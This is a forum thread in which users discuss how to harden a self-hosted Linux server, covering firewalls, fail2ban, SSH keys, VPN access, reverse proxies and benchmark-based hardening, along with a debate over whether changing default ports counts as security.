Acronyms, initialisms, abbreviations, contractions, and other phrases which expand to something larger, that I’ve seen in this thread:
Fewer Letters More Letters DNS Domain Name Service/System IP Internet Protocol SSH Secure Shell for remote terminal access SSL Secure Sockets Layer, for transparent encryption TCP Transmission Control Protocol, most often over IP VNC Virtual Network Computing for remote desktop access VPN Virtual Private Network VPS Virtual Private Server (opposed to shared hosting)
8 acronyms in this thread; the most compressed thread commented on today has 9 acronyms.
[Thread #693 for this sub, first seen 20th Apr 2024, 15:55] [FAQ] [Full list] [Contact] [Source code]
fail2ban
… is an intrusion prevention software framework. Written in the Python programming language, it is designed to prevent brute-force attacks. It is able to run on POSIX systems that have an interface to a packet-control system or firewall installed locally, such as iptables or TCP Wrapper.
Firewall and deciding on an entry point for system administration is a big consideration.
Generating a strong unique password helps immensely. A password manager can help with this.
If this is hosting services reducing open ports with something like Nginx Proxy Manager or equivalent. Tailscale and equivalent(wire guard, wireguard-easy, headscale, net bird, and net maker) are also options.
Getting https right. It’s not such a big deal if all the services are internal. However, it’s not hard to create an internal certificate authority and create certs for services.
If you have server on a VPS. Firewall is again your primary defense. However, if you expose something like ssh fail2ban can help ban ips that make repeated attempts to login to your system. This isn’t some drop in replacement for proper ssh configuration. You should be using key login and secure your ssh configuration away from password logins.
It also helps if you are using something like a proxy for services to setup a filter list. NPM for example allows you to outright deny connection attempts from specific IP ranges. Or just deny everything and allow specific public IPs.
Also, if you are using something like proxmox. Remember to configure your services for least privileges. Basically the idea being just giving a service what it needs to operate and no more. This can encompass service user/group names for file access ect.
All these steps add up to pretty good security if you constantly assess.
Even basic steps in here like turning on the firewall and only opening ports your services need help immensely.
The biggest thing is to change the defaults and to limit access. Unless your are the target of a nation state the attacks against your network will be automated.
Move services away from known ports and don’t use ports that end with well known port numbers (22,80,443).
Moving ssh from 22 to 2222 or 443 to 10443 does nothing. You have ~65000 ports. Pick something random like 6744 or 2458
Just don’t port forward ssh. There is 0 reason to in 99.99% of home cases
Changing ports does nothing except reduced log chatter.
Security through obscurity is not securityIt breaks automation. Same thing for changing any default. Change default names, directories and anything else that’s to predictable
Moving ports does help. It is not a sure thing but when used in conjunction with other security mechanism can help get rid the of the low hanging fruit of scriptkiddies and automated scans.
Security by obscurity is no security.
It is if you are defending against automation.
It defends against the lowest level of automation. And if that is a legit threat in your model, you are going to have a bad time.
It’s just going to trip you up at some pointI’m not saying it should be your only defense. I’m saying that changing defaults is a good idea for secure systems.
For instance, you should change the default WiFi password on your router.
Yes, because a password is security
But scriptkiddies and automated scans are not a security threat. If they were a legitimate threat to your server, you have bigger problems.
All it does is reduce log chatter.Anyone actually wanting in would port scan, then try and connect to each port, and quickly identify an SSH port
Imagine that the xz exploit actually made it into your server, so your sshd was vulnerable. Having it on another port does seem helpful then. In fact i sometimes think of putting mine on a random secret address in the middle of a /64 ipv6 range, but I haven’t done that yet.
it occurs to me, the xz exploit and similar is a good reason not to run the latest software. It affected Debian Sid but not the stable releases. I’m glad I only run the stable ones.
Imagine that the xz exploit actually made it into your server, so your sshd was vulnerable. Having it on another port does seem helpful then.
Nope. Your entire server can be scanned in less than a second for an open ssh port.
IPv6 does not change the fact since when your server is attacked the hist IP is already known.
I’ve never seen an attack that scans all ports. Normally it just checks open ports and then tries common credentials and exploits. If that fails it moves on to the next IP.
Maybe I’m missing something but how is the host ip known? The server has a maybe-known range of addresses, but I don’t announce which address has an sshd listening. There are 2**64 addresses in the range, so scanning in 1 second doesn’t sound feasible.
Just have 2 ipv4 assigned to your server. Have 1 for all your services, and run ssh on the other allowing root login with the password “admin”.
A random ipv6 in the same subnet as your server is just obscurity.The XZ exploit would be functionally similar to allowing root login using the password “admin”.
Would doing that on a different port be secure? No? Then a different port is not security, it’s obscurity.Obscurity is just going to trip you up at some point and reduce log chatter.
And yes, running LTSB/stable is a sensible choice for servers.
The XZ backdoor was not exploited so it is hard to say what would of been effective.
The important thing to note is changing the defaults on systems. Defaults are bad because it makes it easy to take over a large number of systems easily. Even right now there are bots testing common ports for weaknesses.
Automated attacks are a huge threat. Changing defaults shouldn’t be your only security practice but it can significantly help defend a network.
Still does nothing when scanning the entire ipv4 address space achievable so quickly. You can also use services like shodan to find vulnerable services on any ports.
Use SSH keys, stay upgraded. Make management services (SSH, RDP, admin services) accessible only via VPN (WireGuard). Only expose 80 and 443 to the internet, if necessary.
Setup Fail2ban
Login only with SSH keys. MFA on SSH login. Use SSH proto 2.
Disable passwords, x11 forwarding, root logins
Reduce Idle timeout interval
Limit users’ SSH access
That should be more than enough for the average use case.
Containers can help lock services down if you do it right.
You can have 2FA on ssh?
Yep. Use SSH keys, not just protocol.
On connection, it’ll ask for your SSH password (this is different from the users password).
After that with something like authelia in place, you’ll be asked for a 2fa code.
So, no. SSH can’t do 2FA? I would need to set up Authelia and connect through that? I already use ssh keys instead of passwords to connect to my server
Yes it can. I literally have it set up right now.
When I connect to my vps I am promoted for the password for my SSH key. Only works on a machine that has the ssh key.
Then I need to use 2fa.
Ah, so it the asks for the TOTP provided by Authelia? I misunderstood, sorry. That’s pretty cool. Do you maybe still have the guide you used to set that up?
Regular updates are definitely necessary too. Also, if you do limit SSH users to a chroot make sure you limit TCP (port) forwarding too.
Don’t expose anything to the Internet that you don’t absolutely have to. If you can, put everything behind a VPN gateway.
Make backups. Follow the 3-2-1 rule.
Will a wireguard docker image work for getting ssh access to my server?
I wouldn’t recommend putting ssh behind any vpn connection unles you have a secondary access to the machine (for example virtual tty/terminal from your provider or local network ssh). At best, ssh should be the only publicly accessible service (unless hosting other services that need to be public accessible).
I usually move the ssh port to some higher number just to get rid of the basic scanners/skiddies.
Also disable password login (only keys) and no root login.
And for extra hardening, explicitly allow ssh for only users that need it (in sshd config).
Ssh behind a wire guard VPN server is technically more secure if you don’t have a key-only login, but a pain if the container goes down or if you need to access the server without access to wireguards VPN client on your device.
Highly recommend getting a router that can accept wireguard connections. If the router goes down you’re not accessing anything anyways.
Then always put ssh behind the wireguard connections.
For a homelab, there is rarely a need to expose ssh directly so best practice will always be to have multi layered security when possible.
Yeah it’s good to have a system separate from the main server. It’s always so frustrating having to debug wireguard issues cause there’s some problem with docker
Stumbled uppon this guide
https://github.com/imthenachoman/How-To-Secure-A-Linux-Server
I think its a good place to start
Minimize installation and keep it streamlined. Update promptly. Choose applications that are still supported or have an active community.
- crowdsec
- SSH - change port, disable root login, disable password login, setup SSH keys using SK(YubiKey in my case)
- nftables - I use https://github.com/etkaar/nftm to keep things quick and simple. I like the fact if will convert DNS entries to IPs. I then just use dynamic DNS update clients on all my endpoints
- WireGuard for access to services other than SSH(in some cases port 443 will be open if its a web server or proxy)
- rsyslog to forward auth logs to my central syslog server
disable root login
That does not do much in practice. When a user is compromised a simple alias put in the .bashrc can compromise the sudo password.
Explicitly limit the user accounts that can login so that accidentally no test or service account with temporary credentials can login via ssh is the better recommendation.
I think the point is that root is a universal user found on all linux systems where as users have all kinds of names. It narrows down the variables to brute-force, so simply removing the ability to use it means they have to guess a username and a password.
guess a username and a password.
Security by obscurity is no security. Use something like fail2ban to prevent brute force. When you use a secure password and or key this also does not matter much.
Something something don’t let ‘good’ be the enemy of ‘perfect’
Do a search for you server OS + STIG
Then, for each service you’re hosting on that server, do a search for:
Service/Program name + STIG/Benchmark
There’s tons of work already done by the vendors in conjunction with the DoD (and CIS) to create lists of potential vulnerable settings that can be corrected before deploying the server.
Along with this, you can usually find scripts and/or Ansible playbooks that will do most of the hardening for you. Though it’s a good Idea to understand what you do and do not need done.
fail2ban / brute forcing prevention
quick, frequent updates(!)
containerization / virtualization
secure passwords, better keys
firewall
a hardened operating system (distribution)
SELinux / Apparmor / … / OpenBSD
not installing unnecessary stuff
An admin who is an expert and knows what they do.
Me, two+ decades into tinkering and still a dumbass: “look at me, I’m the expert admin now”
I like to require access to 22 via IP whitelist and all services on SSL behind a reverse proxy. Doesn’t leave much surface to attack.
Also, move ssh to a different, higher port. Since ssh isn’t exactly for noobs, changing the port is easy enough to work with and that alone already reduces port scans and what not
I recently setup Guacamole (Web based VNC/RDP/SSH) with totp and was able to close external SSH access. Now everything I run can sit behind a single reverse proxy, no extra ports.
Ask yourself a few questions first before following the massive amount of suggestions and then locking yourself out and so on.
- What are you worried about ?
- How important is your stuff ?
- Make backups and check them
Still worried ? Then there’s the easy way out : Hire some security auditor to help you find holes you left.
Air gapping
/s
Ubuntu has a set of scripts you can run to harden a new server (not advisable on a server that has already been configured for something). You need an Ubuntu Pro subscription to access them but you can get a free trial and then cancel it after you’ve finished.
More info at https://ubuntu.com/security/cis.
I did this process for a customer recently and it was pretty straightforward and much much more thorough (over 100 configuration changes) than just tweaking SSH and fail2ban.
I expect other commercially-oriented distros offer something similar.
Fwiw you don’t need to cancel or trial anything. Everyone can get free Ubuntu pro licensesbfor up to 5 machines
Leak the scripts?